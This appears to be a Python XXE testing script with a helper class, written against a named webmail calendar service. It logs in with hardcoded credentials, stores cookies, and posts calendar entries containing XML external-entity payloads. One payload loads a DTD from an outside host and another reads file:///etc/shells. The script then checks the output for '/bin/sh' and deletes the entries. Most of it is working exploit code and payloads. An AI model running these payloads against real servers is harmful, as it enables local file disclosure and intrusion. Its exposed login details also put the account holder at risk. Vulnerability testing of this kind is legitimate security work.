import XXE_check if __name__=="__main__": try: check=XXE_check.xxe_check() #登录 input_url="http://mail.richinfo.cn/" getLoginUrl="http://mail.richinfo.cn/webmail/login/loginapi.do" getLoginDict={ 'usernumber':"zhangxinxin", 'password':"xinxin123", 'validateCode':"", 'returnurl':"http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do", 'loginType':"WEB", 'version':"version", 'userid':"zhangxinxin", 'mailType':"0", 'passwordType':"0", 'domain':"richinfo.cn", 'mobileNumber':"zhangxinxin", 'model':"MAIL" } check.login(input_url,getLoginUrl,getLoginDict) sid=check.get_sid() # print("main_sid=%s"% sid) #添加用例(<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd">) add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid add_dict1='<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd"><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&test;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">zhangxinxin@richinfo.cn</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>'.encode("ascii") #查看 test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid test_dict='<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>'.encode("ascii") seqNos1=check.XXE_go(add_url,add_dict1,test_url,test_dict) print("测试用例为:<!DOCTYPE svg SYSTEM ‘http://oa05.com/11.dtd’>") # print(seqNos1) #删除 del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid del_dict=('<object><int name="comeFrom">0</int><int name="seqNos">'+str(seqNos1)+'</int><int name="actionType">0</int></object>').encode("ascii") check.del_test(del_url,del_dict) #添加用例(<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]>) add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid add_dict2='<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&all;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">zhangxinxin@richinfo.cn</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>'.encode("ascii") #查看 test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid test_dict='<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>'.encode("ascii") seqNos2=check.XXE_go(add_url,add_dict2,test_url,test_dict) print("测试用例为:<!DOCTYPE ANY [<!ENTITY all SYSTEM ‘file:///etc/shells’>]>") # print(seqNos2) #删除 del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid del_dict=('<object><int name="comeFrom">0</int><int name="seqNos">'+str(seqNos2)+'</int><int name="actionType">0</int></object>').encode("ascii") check.del_test(del_url,del_dict) except Exception as e: print(e)
import urllib.request,http.cookiejar,re class xxe_check: def __init__(self): self.cj=http.cookiejar.CookieJar() #获取cookie #引用cookie self.opener=urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj)) self.opener.addheaders=[('Content-Type','application/x-www-form-urlencoded')] #登录 def login(self,input_url,getLoginUrl,getLoginDict): resp=self.opener.open(input_url) postData=urllib.parse.urlencode(getLoginDict); postData=postData.encode('utf-8') resp2=self.opener.open(getLoginUrl,data=postData) #getLoginResponse=resp2.read().decode("utf-8") #print("getLoginResponse:%s"% getLoginResponse) f=open("cookie.txt","w") for c in self.cj: # print(c.name,"="*6,c.value) f.write(c.name+"="+c.value+";") f.write(c.name+"="+c.value+";"+" ") #获取sid def get_sid(self): #先从本地读取cookie,然后在截取其中sid的值 f=open("cookie.txt") allmsg=f.read() sid_location=allmsg.find("lang") # print(sid_location) sid=allmsg[sid_location+4:sid_location+42] return sid #执行XXE用例 def XXE_go(self,add_url,add_dict,test_url,test_dict): try: # print("++++++++++++++++++++") resadd=self.opener.open(add_url,data=add_dict) # print("*********************************") for_seqNos=resadd.read().decode("utf-8") seqNos=for_seqNos[for_seqNos.find("seqNo")+7:for_seqNos.find("seqNo")+10] # print("for_seqNos:%s"% for_seqNos) # print("seqNos_test:%s"% seqNos) if for_seqNos.find("S_OK")>0: #查看日历 riliresult=self.opener.open(test_url,data=test_dict) all_msg=riliresult.read().decode("utf-8") begin_msg=all_msg.find(seqNos) msg=all_msg[begin_msg:begin_msg+1000] end_msg=msg.find("}") print(msg) if msg[begin_msg:end_msg].find("/bin/sh")>0: # print(type(seqNos)) print("存在XXE漏洞") else: print("不存在XXE漏洞") else: print("没有发现XXE漏洞") #判断seqNOS的值是否为空 if seqNos.strip()=="": return 0 elif int(seqNos)>0: return seqNos except Exception as e: print(e) #删除添加的内容 def del_test(self,del_url,del_dict): res=self.opener.open(del_url,data=del_dict) if res.read().decode("utf-8").find('"code":"S_OK"')>0: print("删除成功!") else: print("删除失败!")